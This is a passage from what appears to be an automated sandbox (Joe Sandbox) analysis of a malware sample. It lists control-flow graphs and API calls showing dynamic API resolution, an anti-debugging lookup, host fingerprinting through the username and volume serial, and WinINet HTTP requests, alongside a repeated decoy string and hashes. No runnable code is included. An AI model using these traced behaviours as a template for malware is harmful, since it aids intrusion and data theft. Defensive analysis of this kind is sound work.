37343->37344 37345 184610 2 API calls 37344->37345 37346 183feb 37345->37346 37347 184610 2 API calls 37346->37347 37348 184004 37347->37348 37349 184610 2 API calls 37348->37349 37350 18401d 37349->37350 37351 184610 2 API calls 37350->37351 37352 184036 37351->37352 37353 184610 2 API calls 37352->37353 37354 18404f 37353->37354 37355 184610 2 API calls 37354->37355 37356 184068 37355->37356 37357 184610 2 API calls 37356->37357 37358 184081 37357->37358 37359 184610 2 API calls 37358->37359 37360 18409a 37359->37360 37361 184610 2 API calls 37360->37361 37362 1840b3 37361->37362 37363 184610 2 API calls 
37362->37363 37364 1840cc 37363->37364 37365 184610 2 API calls 37364->37365 37366 1840e5 37365->37366 37367 184610 2 API calls 37366->37367 37368 1840fe 37367->37368 37369 184610 2 API calls 37368->37369 37370 184117 37369->37370 37371 184610 2 API calls 37370->37371 37372 184130 37371->37372 37373 184610 2 API calls 37372->37373 37374 184149 37373->37374 37375 184610 2 API calls 37374->37375 37376 184162 37375->37376 37377 184610 2 API calls 37376->37377 37378 18417b 37377->37378 37379 184610 2 API calls 37378->37379 37380 184194 37379->37380 37381 184610 2 API calls 37380->37381 37382 1841ad 37381->37382 37383 184610 2 API calls 37382->37383 37384 1841c6 37383->37384 37385 184610 2 API calls 37384->37385 37386 1841df 37385->37386 37387 184610 2 API calls 37386->37387 37388 1841f8 37387->37388 37389 184610 2 API calls 37388->37389 37390 184211 37389->37390 37391 184610 2 API calls 37390->37391 37392 18422a 37391->37392 37393 184610 2 API calls 37392->37393 37394 184243 37393->37394 37395 184610 2 API calls 37394->37395 37396 18425c 37395->37396 37397 184610 2 API calls 37396->37397 37398 184275 37397->37398 37399 184610 2 API calls 37398->37399 37400 18428e 37399->37400 37401 184610 2 API calls 37400->37401 37402 1842a7 37401->37402 37403 184610 2 API calls 37402->37403 37404 1842c0 37403->37404 37405 184610 2 API calls 37404->37405 37406 1842d9 37405->37406 37407 184610 2 API calls 37406->37407 37408 1842f2 37407->37408 37409 184610 2 API calls 37408->37409 37410 18430b 37409->37410 37411 184610 2 API calls 37410->37411 37412 184324 37411->37412 37413 184610 2 API calls 37412->37413 37414 18433d 37413->37414 37415 184610 2 API calls 37414->37415 37416 184356 37415->37416 37417 184610 2 API calls 37416->37417 37418 18436f 37417->37418 37419 184610 2 API calls 37418->37419 37420 184388 37419->37420 37421 184610 2 API calls 37420->37421 37422 1843a1 37421->37422 37423 184610 2 API calls 37422->37423 37424 1843ba 37423->37424 37425 184610 2 API calls 37424->37425 
37426 1843d3 37425->37426 37427 184610 2 API calls 37426->37427 37428 1843ec 37427->37428 37429 184610 2 API calls 37428->37429 37430 184405 37429->37430 37431 184610 2 API calls 37430->37431 37432 18441e 37431->37432 37433 184610 2 API calls 37432->37433 37434 184437 37433->37434 37435 184610 2 API calls 37434->37435 37436 184450 37435->37436 37437 184610 2 API calls 37436->37437 37438 184469 37437->37438 37439 184610 2 API calls 37438->37439 37440 184482 37439->37440 37441 184610 2 API calls 37440->37441 37442 18449b 37441->37442 37443 184610 2 API calls 37442->37443 37444 1844b4 37443->37444 37445 184610 2 API calls 37444->37445 37446 1844cd 37445->37446 37447 184610 2 API calls 37446->37447 37448 1844e6 37447->37448 37449 184610 2 API calls 37448->37449 37450 1844ff 37449->37450 37451 184610 2 API calls 37450->37451 37452 184518 37451->37452 37453 184610 2 API calls 37452->37453 37454 184531 37453->37454 37455 184610 2 API calls 37454->37455 37456 18454a 37455->37456 37457 184610 2 API calls 37456->37457 37458 184563 37457->37458 37459 184610 2 API calls 37458->37459 37460 18457c 37459->37460 37461 184610 2 API calls 37460->37461 37462 184595 37461->37462 37463 184610 2 API calls 37462->37463 37464 1845ae 37463->37464 37465 184610 2 API calls 37464->37465 37466 1845c7 37465->37466 37467 184610 2 API calls 37466->37467 37468 1845e0 37467->37468 37469 184610 2 API calls 37468->37469 37470 1845f9 37469->37470 37471 199f20 37470->37471 37472 199f30 43 API calls 37471->37472 37473 19a346 8 API calls 37471->37473 37472->37473 37474 19a3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37473->37474 37475 19a456 37473->37475 37474->37475 37476 19a463 8 API calls 37475->37476 37477 19a526 37475->37477 37476->37477 37478 19a5a8 37477->37478 37479 19a52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37477->37479 37480 19a5b5 6 API calls 37478->37480 37481 19a647 37478->37481 37479->37478 37480->37481 37482 19a72f 

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 660 199bb0-199bc4 call 199aa0 663 199bca-199dde call 199ad0 GetProcAddress * 21 660->663 664 199de3-199e42 LoadLibraryA * 5 660->664 663->664 666 199e5d-199e64 664->666 667 199e44-199e58 GetProcAddress 664->667 669 199e96-199e9d 666->669 670 199e66-199e91 GetProcAddress * 2 666->670 667->666 671 199eb8-199ebf 669->671 672 199e9f-199eb3 GetProcAddress 669->672 670->669 673 199ed9-199ee0 671->673 674 199ec1-199ed4 GetProcAddress 671->674 672->671 675 199f11-199f12 673->675 676 199ee2-199f0c GetProcAddress * 2 673->676 674->673 676->675
                                        APIs
                                        • GetProcAddress.KERNEL32(74DD0000,011C2398), ref: 00199BF1
                                        • GetProcAddress.KERNEL32(74DD0000,011C2338), ref: 00199C0A
                                        • GetProcAddress.KERNEL32(74DD0000,011C2410), ref: 00199C22
                                        • GetProcAddress.KERNEL32(74DD0000,011C2500), ref: 00199C3A
                                        • GetProcAddress.KERNEL32(74DD0000,011C22F0), ref: 00199C53
                                        • GetProcAddress.KERNEL32(74DD0000,011C8FB8), ref: 00199C6B
                                        • GetProcAddress.KERNEL32(74DD0000,011B5810), ref: 00199C83
                                        • GetProcAddress.KERNEL32(74DD0000,011B5A70), ref: 00199C9C
                                        • GetProcAddress.KERNEL32(74DD0000,011C2428), ref: 00199CB4
                                        • GetProcAddress.KERNEL32(74DD0000,011C2440), ref: 00199CCC
                                        • GetProcAddress.KERNEL32(74DD0000,011C24D0), ref: 00199CE5
                                        • GetProcAddress.KERNEL32(74DD0000,011C23B0), ref: 00199CFD
                                        • GetProcAddress.KERNEL32(74DD0000,011B59B0), ref: 00199D15
                                        • GetProcAddress.KERNEL32(74DD0000,011C2470), ref: 00199D2E
                                        • GetProcAddress.KERNEL32(74DD0000,011C2458), ref: 00199D46
                                        • GetProcAddress.KERNEL32(74DD0000,011B5770), ref: 00199D5E
                                        • GetProcAddress.KERNEL32(74DD0000,011C2488), ref: 00199D77
                                        • GetProcAddress.KERNEL32(74DD0000,011C24A0), ref: 00199D8F
                                        • GetProcAddress.KERNEL32(74DD0000,011B5970), ref: 00199DA7
                                        • GetProcAddress.KERNEL32(74DD0000,011C2230), ref: 00199DC0
                                        • GetProcAddress.KERNEL32(74DD0000,011B5750), ref: 00199DD8
                                        • LoadLibraryA.KERNEL32(011C25D8,?,00196CA0), ref: 00199DEA
                                        • LoadLibraryA.KERNEL32(011C2590,?,00196CA0), ref: 00199DFB
                                        • LoadLibraryA.KERNEL32(011C25C0,?,00196CA0), ref: 00199E0D
                                        • LoadLibraryA.KERNEL32(011C25A8,?,00196CA0), ref: 00199E1F
                                        • LoadLibraryA.KERNEL32(011C2518,?,00196CA0), ref: 00199E30
                                        • GetProcAddress.KERNEL32(75A70000,011C2530), ref: 00199E52
                                        • GetProcAddress.KERNEL32(75290000,011C2560), ref: 00199E73
                                        • GetProcAddress.KERNEL32(75290000,011C2548), ref: 00199E8B
                                        • GetProcAddress.KERNEL32(75BD0000,011C2578), ref: 00199EAD
                                        • GetProcAddress.KERNEL32(75450000,011B5710), ref: 00199ECE
                                        • GetProcAddress.KERNEL32(76E90000,011C90C8), ref: 00199EEF
                                        • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00199F06
                                        Strings
                                        • NtQueryInformationProcess, xrefs: 00199EFA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: NtQueryInformationProcess
                                        • API String ID: 2238633743-2781105232
                                        • Opcode ID: 294e32d9c059f9665ddb54a544d1eb9b04ee553e597cfdeea8c6189327210dca
                                        • Instruction ID: d72efc3365a72cc1d62b0d8ce138472b8eda49e451a7fa0da422d078f6fe2c5b
                                        • Opcode Fuzzy Hash: 294e32d9c059f9665ddb54a544d1eb9b04ee553e597cfdeea8c6189327210dca
                                        • Instruction Fuzzy Hash: F0A11AB5518700AFC384DFA8FC889567BB9A749703B51867AB909C3772DB34E940CF68

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 764 184610-1846e5 RtlAllocateHeap 781 1846f0-1846f6 764->781 782 1846fc-18479a 781->782 783 18479f-1847f9 VirtualProtect 781->783 782->781
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0018465F
                                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 001847EC
                                        Strings
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184693
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184784
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001847AA
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184638
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0018478F
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0018467D
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184779
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184622
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001846C8
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184672
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0018476E
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001847B5
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0018479F
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184688
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001846A7
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184707
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184643
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001846BD
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0018471D
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001847CB
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184617
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184712
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001846FC
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001846B2
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184728
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184667
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001847C0
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001846D3
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00184763
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0018462D
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeapProtectVirtual
                                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                        • API String ID: 1542196881-2218711628
                                        • Opcode ID: 0f2632cb7f1fe0cd7758ef2eadb8621a0113e77f7d98eeb81bd5b03e087cd2e0
                                        • Instruction ID: 27fa05fafe1547a498a64e34ad4bc57587c3a13ed963a281c08b826322ca834f
                                        • Opcode Fuzzy Hash: 0f2632cb7f1fe0cd7758ef2eadb8621a0113e77f7d98eeb81bd5b03e087cd2e0
                                        • Instruction Fuzzy Hash: ED41E2A87C66067EE728B7ACA8EDEDF76675FD7708F505844AC08522C2CBF095404627

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1033 1862d0-18635b call 19aab0 call 184800 call 19aa50 InternetOpenA StrCmpCA 1040 18635d 1033->1040 1041 186364-186368 1033->1041 1040->1041 1042 186559-186575 call 19aab0 call 19ab10 * 2 1041->1042 1043 18636e-186392 InternetConnectA 1041->1043 1062 186578-18657d 1042->1062 1045 186398-18639c 1043->1045 1046 18654f-186553 InternetCloseHandle 1043->1046 1048 1863aa 1045->1048 1049 18639e-1863a8 1045->1049 1046->1042 1051 1863b4-1863e2 HttpOpenRequestA 1048->1051 1049->1051 1053 1863e8-1863ec 1051->1053 1054 186545-186549 InternetCloseHandle 1051->1054 1056 1863ee-18640f InternetSetOptionA 1053->1056 1057 186415-186455 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1046 1056->1057 1058 18647c-18649b call 198ad0 1057->1058 1059 186457-186477 call 19aa50 call 19ab10 * 2 1057->1059 1067 186519-186539 call 19aa50 call 19ab10 * 2 1058->1067 1068 18649d-1864a4 1058->1068 1059->1062 1067->1062 1071 1864a6-1864d0 InternetReadFile 1068->1071 1072 186517-18653f InternetCloseHandle 1068->1072 1076 1864db 1071->1076 1077 1864d2-1864d9 1071->1077 1072->1054 1076->1072 1077->1076 1080 1864dd-186515 call 19acc0 call 19abb0 call 19ab10 1077->1080 1080->1071
                                        APIs
                                          • Part of subcall function 0019AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0019AAF6
                                          • Part of subcall function 00184800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00184889
                                          • Part of subcall function 00184800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00184899
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                        • InternetOpenA.WININET(001A0DFF,00000001,00000000,00000000,00000000), ref: 00186331
                                        • StrCmpCA.SHLWAPI(?,011CE938), ref: 00186353
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00186385
                                        • HttpOpenRequestA.WININET(00000000,GET,?,011CE398,00000000,00000000,00400100,00000000), ref: 001863D5
                                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0018640F
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00186421
                                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0018644D
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 001864BD
                                        • InternetCloseHandle.WININET(00000000), ref: 0018653F
                                        • InternetCloseHandle.WININET(00000000), ref: 00186549
                                        • InternetCloseHandle.WININET(00000000), ref: 00186553
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                        • String ID: ERROR$ERROR$GET
                                        • API String ID: 3749127164-2509457195
                                        • Opcode ID: ceec566abbd4d99fdb9423f1b4f452824f0fb7b141c29c947e5ce2902bd8e5d5
                                        • Instruction ID: c5a36f71bae3e2f4bd82862b3284c1d038b503c723d899ad1b19760188b50f30
                                        • Opcode Fuzzy Hash: ceec566abbd4d99fdb9423f1b4f452824f0fb7b141c29c947e5ce2902bd8e5d5
                                        • Instruction Fuzzy Hash: C4715E71A00218ABDF24EFA0DC55BEE7779BF44700F5081A8F50A6B190DBB46A84CF95

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1356 197690-1976da GetWindowsDirectoryA 1357 1976dc 1356->1357 1358 1976e3-197757 GetVolumeInformationA call 198e90 * 3 1356->1358 1357->1358 1365 197768-19776f 1358->1365 1366 19778c-1977a7 GetProcessHeap RtlAllocateHeap 1365->1366 1367 197771-19778a call 198e90 1365->1367 1368 1977a9-1977b6 call 19aa50 1366->1368 1369 1977b8-1977e8 wsprintfA call 19aa50 1366->1369 1367->1365 1377 19780e-19781e 1368->1377 1369->1377
                                        APIs
                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 001976D2
                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0019770F
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00197793
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0019779A
                                        • wsprintfA.USER32 ref: 001977D0
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                        • String ID: :$C$\
                                        • API String ID: 1544550907-3809124531
                                        • Opcode ID: deb55415c205c01f98e54ace0587731a4e2851597b09b7f32bc61e3c7a237989
                                        • Instruction ID: 913fe7c8096eedbddc9a7bc6a41f451ca7a41cd618b6750517a7991201ea4d0a
                                        • Opcode Fuzzy Hash: deb55415c205c01f98e54ace0587731a4e2851597b09b7f32bc61e3c7a237989
                                        • Instruction Fuzzy Hash: BE41D6B1D04348EBDF10DF94DC85BDEBBB8AF19700F1040A8F609AB281D774AA44CBA5
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001811B7), ref: 00197A10
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00197A17
                                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00197A2F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateNameProcessUser
                                        • String ID:
                                        • API String ID: 1296208442-0
                                        • Opcode ID: 7f61f03a958e7c56641c37fa3ed0b7ebb2d77c6c07aa64626f15d7f1e5580ee1
                                        • Instruction ID: 2cacf0e72f1cab66aa74f6c59cbfb30b39ae733c0d555a56adda0b7202abaa8e
                                        • Opcode Fuzzy Hash: 7f61f03a958e7c56641c37fa3ed0b7ebb2d77c6c07aa64626f15d7f1e5580ee1
                                        • Instruction Fuzzy Hash: B1F04FB1948309EBCB04DF98ED45BAEBBB8EB05711F10026AF615A3680C7755900CBA1
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitInfoProcessSystem
                                        • String ID:
                                        • API String ID: 752954902-0
                                        • Opcode ID: 5c3d6d49de4fc0a5472708a4832a4b56e00d81fbc0e46f4fc3c9c6e8e32b5387
                                        • Instruction ID: aa7f05b17e04610c01d49a210101918126036b8e4e415ac32997c20ece9711fa
                                        • Opcode Fuzzy Hash: 5c3d6d49de4fc0a5472708a4832a4b56e00d81fbc0e46f4fc3c9c6e8e32b5387
                                        • Instruction Fuzzy Hash: 86D09E7590430CABCB04EFE0A9896EDBB78BB08616F100565DD0562341EB319595CB69

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
